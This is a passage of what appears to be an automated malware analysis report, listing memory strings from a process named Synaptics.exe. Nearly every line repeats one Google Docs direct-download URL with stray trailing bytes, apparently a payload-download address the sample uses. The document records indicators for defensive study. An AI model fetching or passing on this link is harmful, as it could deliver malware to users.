                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi)
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiFxX-
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadices
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadights
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading..
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading..M
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiv
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyF
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor8
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyt
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj(xXR
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjo
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk&7
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkP;YR
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadktop
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl:W
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyB
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlex
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlifo
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlld
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem0
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem;
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme8
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlsx
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmGtY
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmS9Z
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmaL
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmax-width:390px;min-height
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeWa
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmzt
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn=
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnR6
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaly
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc$
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncD
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel5
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellk
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelll
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellq
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellw
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnect
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnectiZ
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlg
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnf
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng$
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng7
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadngH
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor%
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor0
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor:
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyorP
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyoro
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnsafed
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnts
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado(9Y-
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado.co
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoVvZ
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoc
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadod
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleQ
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoglet
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom#a
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom0
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadones
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo.coU
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador(
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
